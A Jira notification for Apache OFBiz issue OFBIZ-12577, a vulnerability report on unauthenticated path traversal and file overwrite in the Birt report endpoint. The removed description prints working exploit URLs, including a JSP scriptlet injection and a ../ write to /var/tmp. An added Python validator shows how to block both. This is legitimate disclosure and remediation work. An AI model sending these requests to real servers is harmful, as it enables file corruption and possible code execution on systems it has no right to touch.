[
https://issues.apache.org/jira/browse/OFBIZ-12577?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Jacques Le Roux updated OFBIZ-12577:
------------------------------------
Description: (was: *Description of the vulnerability*
*Unauth Path Traversal with file corruption*
After reading a note (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142)
about a remote code execution (RCE) vulnerability in Birt, there was an attempt
to reproduce it.
https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=index.jsp&reportBy=%3C%25%0A%20%20out.println(%22OS%3A%20%22%20%2B%20System.getProperty(%22os.name%22))%3B%0A%20%20out.println(%22Current%20dir%3A%20%22%20%2B%20getServletContext().getRealPath(%22%2F%22))%3B%0A%25%3E%0A
I rewrote the system index.jsp file
(~/apache-ofbiz-18.12.05/plugins/birt/webapp/index.jsp),
corrupting it, but the payload didn't work. Before and after making a request
from an unauthorized user.
!image-2022-02-21-15-54-00-257.png!
When accessing the script, the index server returns a 500 error.
!image-2022-02-21-15-54-51-612.png!
An unauthorized user can overwrite and corrupt files in the current folder. Can it go beyond the current folder and overwrite, for example, file /var/tmp/s3cReTfIle? - yes!
https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=../../../../../../../../var/tmp/s3cReTfIle&reportBy=test
!image-2022-02-21-16-00-25-840.png!)
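The report above shows a user-controlled output name (`__document`) being combined with `__overwrite=true` and `../` segments to write outside the report output directory, and a `.jsp` being written although `__format=pdf` was requested. The following is an added example of the kind of server-side check that closes both gaps; it is not OFBiz or Birt code, and the directory name `/srv/birt/output` and the allowed suffix list are assumptions:

```python
"""Added example (not OFBiz/Birt project code): validate a requested output
file name against the directory it must stay inside and the formats the
endpoint is meant to produce. Directory and suffix list are hypothetical."""
from pathlib import Path, PurePosixPath


class UnsafeDocumentPath(ValueError):
    """Raised when the requested output name is rejected."""


# Hypothetical: the only output types this report endpoint should write.
ALLOWED_SUFFIXES = (".pdf", ".html")


def resolve_output_path(base_dir: str, document: str,
                        allowed_suffixes=ALLOWED_SUFFIXES) -> Path:
    """Return base_dir/document only if the normalised result stays inside
    base_dir and carries an allowed extension. Rejects empty names,
    absolute paths, '..' climbs that leave base_dir, and names that resolve
    to the directory itself (e.g. '..' or '.')."""
    if not document or document.strip() != document:
        raise UnsafeDocumentPath("empty or whitespace-padded document name")
    requested = PurePosixPath(document)
    if requested.is_absolute():
        raise UnsafeDocumentPath("absolute paths are not allowed")
    base = Path(base_dir).resolve()
    # strict=False: the target does not exist yet, it is about to be written.
    candidate = (base / requested).resolve(strict=False)
    try:
        candidate.relative_to(base)  # raises ValueError if it escaped
    except ValueError:
        raise UnsafeDocumentPath(f"{document!r} escapes {base_dir}") from None
    if candidate == base:
        raise UnsafeDocumentPath("document name resolves to the directory")
    # The report showed index.jsp being written with __format=pdf; tie the
    # output name to the formats the endpoint actually renders.
    if candidate.suffix.lower() not in allowed_suffixes:
        raise UnsafeDocumentPath(f"disallowed output type {candidate.suffix!r}")
    return candidate


def is_safe_document(base_dir: str, document: str) -> bool:
    """Accept/reject wrapper around resolve_output_path."""
    try:
        resolve_output_path(base_dir, document)
    except UnsafeDocumentPath:
        return False
    return True
```

With this check the traversal string from the report (`../../../../../../../../var/tmp/s3cReTfIle`) and the `index.jsp` overwrite are both refused before any file is opened, while ordinary names and subdirectories under the output folder still work.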
> Pending issue
> -------------
>
> Key: OFBIZ-12577
> URL: https://issues.apache.org/jira/browse/OFBIZ-12577
> Project: OFBiz
> Issue Type: Bug
> Affects Versions: 18.12.05
> Reporter: Nikita Podotykin
> Priority: Major
> Fix For: 18.12.05
>
> Original Estimate: 72h
> Remaining Estimate: 72h
>
--
This message was sent by Atlassian Jira
(v8.20.1#820001)